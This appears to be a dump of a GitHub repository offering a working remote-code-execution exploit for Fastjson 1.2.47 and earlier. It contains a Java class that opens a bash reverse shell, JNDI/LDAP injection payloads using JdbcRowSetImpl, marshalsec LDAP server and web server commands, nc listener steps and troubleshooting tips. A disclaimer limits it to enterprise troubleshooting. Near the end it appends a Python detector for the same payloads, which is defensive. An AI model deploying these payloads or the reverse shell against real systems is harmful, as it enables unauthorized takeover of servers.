Full Code of CaijiOrz/fastjson-1.2.47-RCE for AI

Repository: CaijiOrz/fastjson-1.2.47-RCE
Branch: master
Commit: 9e2c04771a2b
Files: 3
Total size: 40.5 MB

Directory structure:
gitextract_emq_86uu/

├── Exploit.java
├── README.md
└── marshalsec-0.0.3-SNAPSHOT-all.jar

================================================
FILE CONTENTS
================================================

================================================
FILE: Exploit.java
================================================
public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

================================================
FILE: README.md
================================================
# fastjson-1.2.47-RCE
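Exploit tool and method for the Fastjson <= 1.2.47 remote command execution vulnerability, with notes on the pitfalls to avoid.

All of the steps below were tested and confirmed working on Ubuntu 18. OpenJDK must be switched to version 8, and the version 8 javac must be used.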
```
> java -version
openjdk version "1.8.0_222"

> javac -version
javac 1.8.0_222
```

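### Disclaimer

The user bears sole responsibility for any direct or indirect consequences and losses arising from spreading or using the information provided by this tool; the author accepts no liability for them.
I reserve the right to modify and interpret this tool. Without permission from the network security authorities and other relevant authorities, using this tool to carry out any attack activity is strictly prohibited, as is using it for commercial purposes in any form.
This tool is licensed only for troubleshooting inside an enterprise; any illegal use is strictly prohibited. Please strictly comply with the Cybersecurity Law; otherwise the author accepts no responsibility for any consequences.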

### 0x00 Assumed vulnerable functionality

```
# The content of the param parameter is parsed by fastjson

POST /note/submit/

param={'id':29384,'content':'Hello','type':'string'}
```

### 0x01 Testing outbound connectivity

Prepare a server to listen for traffic
```
nc -lvvp 7777
```

Send the payload, changing IP to the listening server's IP
```
POST /note/submit/

param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://IP:7777/Exploit","autoCommit":true}}}
```

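If the listening server receives traffic, continue to the next step

### 0x02 Preparing the LDAP service and the web service

Place marshalsec-0.0.3-SNAPSHOT-all.jar and Exploit.java in the same directory

Run the LDAP service from the current directory, changing IP to the IP of this server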
```
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://IP/#Exploit
```

Run the web service from the current directory
```
python3 -m http.server 80   # or: python -m SimpleHTTPServer 80
```

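### 0x03 Modifying Exploit and compiling it to a class file

Change the reverse-connection IP and port in Exploit.java (the IP and listening port of the server that will receive the reverse shell)

Compile Exploit.java with javac to produce Exploit.class (note: the javac version should be close to the target server's, otherwise the target server cannot parse the class file and reports an error)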
```
javac Exploit.java
```

### 0x03 Preparation

To recap, the directory should now contain three files
```
marshalsec-0.0.3-SNAPSHOT-all.jar
Exploit.java
Exploit.class
```

The server is running the LDAP and web services
```
LDAP Server:Listening on 0.0.0.0:1389
Web  Server:Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

An nc listener is ready to receive the reverse shell
```
nc -lvvp 7777
```

### 0x04 Execution
Change ip to the IP of the server running the LDAP and web services
```
POST /note/submit

param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit","autoCommit":true}}}
```

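Next, if no errors occur, LDAP redirects the request to the web service, and Fastjson downloads Exploit.class, then parses and runs it

Both your LDAP service and your web service will log the request; if all goes well, your nc will also receive the reverse shell

### 0x05 Problems

When the javac version differs too much from the target server's, an error like the one below is reported, so Exploit.java needs to be compiled with the 1.8 javac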
```
Caused by: java.lang.UnsupportedClassVersionError: Exploit has been compiled by a more recent version of the Java Runtime (class file version 55.0), this version of the Java Runtime only recognizes class file versions up to 52.0
```

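When the Java version on the server running LDAP is too high, the LDAP service will not work: although it shows as Listening, Fastjson's JNDI lookup reports an error saying the resource cannot be obtained. Use Java 1.8 (OpenJDK 8) to run the LDAP service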
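
A detection-side counterpart to the request bodies in steps 0x01 and 0x04, added here as an example and not part of this repository: it decodes the `param` value and reports the `@type` hints those bodies rely on. The function names, finding labels and sample bodies are assumptions made for illustration; `SAMPLE_MALICIOUS` repeats the step 0x01 body with its `IP` placeholder.

```python
import json
import re
from urllib.parse import parse_qs

# Class names as they appear in the README's request bodies.
CACHE_PRIMER = "java.lang.Class"
JNDI_SINK = "com.sun.rowset.JdbcRowSetImpl"
REMOTE_JNDI = re.compile(r"^(ldaps?|rmi)://", re.I)

# Sample bodies: the first repeats step 0x01 (placeholder IP), the second is constructed.
SAMPLE_MALICIOUS = ('param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
                    '"x":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
                    '"dataSourceName":"ldap://IP:7777/Exploit","autoCommit":true}}}')
SAMPLE_BENIGN = 'param={"id":29384,"content":"Hello","type":"string"}'

def walk(node):
    """Yield every JSON object nested anywhere inside node."""
    if isinstance(node, dict):
        yield node
        for v in node.values():
            yield from walk(v)
    elif isinstance(node, list):
        for v in node:
            yield from walk(v)

def inspect_param(raw):
    """Return a sorted list of findings for one 'param' value."""
    try:
        # raw_decode accepts trailing characters after the first JSON value
        doc, _ = json.JSONDecoder().raw_decode(raw.lstrip())
    except ValueError:
        # Not strict JSON: fall back to a coarse text check.
        return ["unparsed-@type"] if "@type" in raw else []
    findings = set()
    for obj in walk(doc):
        t = obj.get("@type")  # keys are compared after JSON unescaping
        if t is None:
            continue
        findings.add("type-hint")
        if t == CACHE_PRIMER and isinstance(obj.get("val"), str):
            findings.add("class-cache-primer:" + obj["val"])
        if t == JNDI_SINK and REMOTE_JNDI.match(str(obj.get("dataSourceName", ""))):
            findings.add("remote-jndi-datasource")
    return sorted(findings)

def inspect_body(body):
    """Inspect a form-encoded POST body such as 'param={...}'."""
    values = parse_qs(body, keep_blank_values=True).get("param", [])
    return sorted({f for v in values for f in inspect_param(v)})
```

A `type-hint` finding on an endpoint that expects plain data is worth alerting on by itself, since clients of such an endpoint have no reason to send `@type`.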


================================================
FILE: marshalsec-0.0.3-SNAPSHOT-all.jar
================================================
[File too large to display: 40.5 MB]